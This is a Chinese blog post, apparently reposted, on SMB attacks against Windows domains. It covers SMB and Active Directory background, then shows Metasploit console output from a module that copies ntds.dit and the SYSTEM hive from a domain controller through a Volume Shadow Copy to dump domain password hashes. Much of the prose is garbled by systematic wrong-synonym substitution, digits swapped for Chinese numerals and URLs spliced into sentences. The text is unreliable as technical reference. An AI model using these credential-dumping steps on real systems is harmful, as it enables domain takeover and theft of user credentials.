|
|
|
联系客服020-83701501

SMB ATTACK 绕过安全软件的访问

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
SMB ATTACK 绕过安全软件的接见访问

关于SMB

讲解的3六1蛋,服务器动静块(SMB)协定是一种IBM协定,用于在合计机间同享文件、打印机、串口等。SMB 协定可以用在因特网的TCP/IP协定之上,也可以用在其他网络协定如IPX和NetBEUI 之上。
SMB 一种客户机/服务器、请求/相应协定。经过 SMB 协定,客户端操纵法式可以在各种网络环境下读、写服务器上的文件,以及对服务器法式提出服务请求。其他经过 SMB 协定,操纵法式可以接见访问近程服务器真个文件、以及打印机、邮件槽(mailslot)、定名管道(named pipe)等资源。
在 TCP/IP 环境下,客户机经过 NetBIOS over TCP/IP(或 NetBEUI/TCP 或 SPX/IPX)连贯服务器。一旦连贯腐化,客户机可发送 SMB 命令到服务器上,从而客户机或许接见访问同享目录、打开文件、读写文件,以及全体在文件系统上能做的局部变乱。
从 Windows 九5 入手下手,Microsoft Windows 操作系统(operating system)都包含了客户机和服务器 SMB 协定支持。Microsoft 为 网络 供应了 SMB 的开源版本,即通用 网络 文件系统 (CIFS)。与现有 网络 操纵法式如文件传输协定(FTP)比拟, CIFS 灵动性更大。关于 UNIX 系统,可把持一种称为 Samba 的同享软件。

安全关心

SMB 定义了两级安全关心:

同享级关心

(Share Level Protection)操纵于服务器同享目录级。每一个同享目录都需求供应一个接见访问口令。只有口令经过,客户机伎俩接见访问局部同享文件。

用户级关心

(Usr Level Protection)操纵于同享目录中的零丁文件,基于用户接见访问权限。每一个用户(客户机)必须登录服务器而且失去服务器的认证赞成。一旦认证经过,客户机会失去一个 UID .在开初客户机接见访问服务器的过程中都需求把持该 UID 。

Active Directory

活动目录(Active Directory)是面向Windows Standard Server、Windows Enterprise Server以及 Windows Datacenter Server的目录服务。(Active Directory不能运行在Windows Web Server上,然而可以经过它对运行Windows Web Server的合计机终止计划。)Active Directory存储了有关网络器材的动静,而且让计划员和用户或许乞助地查找和把持这些动静。Active Directory把持了一种布局化的数据存储门径,并以此作为根柢对目录动静终止契合逻辑的分层布局。

Microsoft Active Directory 服务是Windows 平台的焦点组件,它为用户计划网络环境各个形成要素的标识和关连供应了一种无力的妙技花色。
活动目录(Active Directory)主要供应以下从命:

  1.   根柢网络服务:包含DNS、WINS、DHCP、证书服务等。
  2.   服务器及客户端合计机计划:计划服务器及客户端合计机账户,局部服务器及客户端合计机参与域计划并施行组战略。
  3.   用户服务:计划用户域账户、用户动静、企业通讯录(与电子邮件系统集成)、用户组计划、用户身份认证、用户受权计划等,按省施行组计划战略。
  4.   资源计划:计划打印机、文件同享服务等网络资源。
  5.   桌面配置:系统计划员可以汇合的配置各种桌面配置战略,如:界面从命的限定、操纵法式履行特征限定、网络连贯限定、安全配置限定等。
  6.   操纵系统撑持:支持财政、人事、电子邮件、企业动静门户、办公被动化、补丁计划、防病毒系统等各种操纵系统。

ntds.dit

在Windows 2000操作系统中,为合营企业需求,并增加windows的网络计划从命,睁开了一种新典范的目录服务–活动目录(active Directory),在活动目录中席卷了active directory域中局部关连资源的器材及该域用户的关连动静,该域的战略和其他紧张的域服务动静。可以说,活动目录驳回了与副本NT系统彻底差距的方 式留存生存糊口生涯数据动静。
Windows 2000 活动目录数据实际是留存生存糊口生涯在一个数据库文件中,这个文件便是%SystemRoot%\ntds\NTDS.DIT(文件位置可以在安设时指定,不过必须是 存放在NTFS花色分区上的).ntds.dit文件可以说是整个活动目录的焦点,此中包含了用户帐号动静等等的关连质料. 活动目录的数据库引擎被称为http://fuzzexp.org/smb_attack.html ExtensibleStorage Engine ( ESE ),Exchange和WINS都可以操纵成立在这个数据引擎上的数据库. ESE存储容量高达1六 兆兆个字节,能席卷一万万之多的数据器材。只有活动目录的数据库能席卷云云多的动静(微软质料鼓吹的).

SMB的不安全

SMB爆过许多伟大BUG。。 这不多讲 你们懂的,当知道了一个SMB的B裂缝当前,袭击步履总是许多

日常的到这个时候久终止Authenticated User Code Execution 袭击,经过口令也许溢出履行SHELLCODE,假设游杀毒软件也许安全软件,很难腐化
Metasploit供应了许多模块,针对SMB袭击绕过杀毒,例如

和终止提取Ntds.dit数据库导出的数据表中的Active Directory的HASH

下场留存生存糊口生涯到了当地 http://fuzzexp.org/smb_attack.html

Default
1234 root@Dis九Team:~# file /tmp/msfhashes/local/5.5.5.7/sam /tmp/msfhashes/local/5.5.5.7/sam: MS Windows registry file, NT/2000 or aboveroot@Dis九Team:~# file /tmp/msfhashes/local/5.5.5.7/sys /tmp/msfhashes/local/5.5.5.7/sys: MS Windows registry file, NT/2000 or above

提取NTDS.dit

Default
12345六78九1011 msf  auxiliary(ntdsgrab) > exploit  [*] 5.5.5.7 - Checking if a Volume Shadow Copy exists already.[+] 5.5.5.7 - Volume Shadow Copy exists on \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1[*] Copying ntds.dit to Windows Temp directory[*] Copying SYSTEM hive file to Windows Temp directory[*] Downloading ntds.dit file[*] Downloading SYSTEM hive file[*] Deleting ntds.dit and SYSTEM hive copies:[*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completed

查抄数据

Default
12 root@Dis九Team:/tmp/NTDS_Grab/5.5.5.7# file ntds ntds: data

参考:

http://www.accuvant.com/blog/2012/11/13/owning-computers-without-shell-access
http://www.pentestgeek.com/2012/11/1六/dumping-domain-password-hashes-using-metasploit-ntds_hashextract-rb/
http://www.九1ri.org/4783.html
http://fuzzexp.org/domain-invasion-of-keimpx.html
http://fuzzexp.org/pass-the-hash-with-nexpose-and-metasploit.html
http://fuzzexp.org/metasploit-post-module-smart_hashdump.html
http://fuzzexp.org/smb_attack.html

本文作者dis九 team 由网络安全攻防研究室(www.九1ri.org)动静安全小组搜集整顿,转载请阐明出处。

数安新闻+更多

证书相关+更多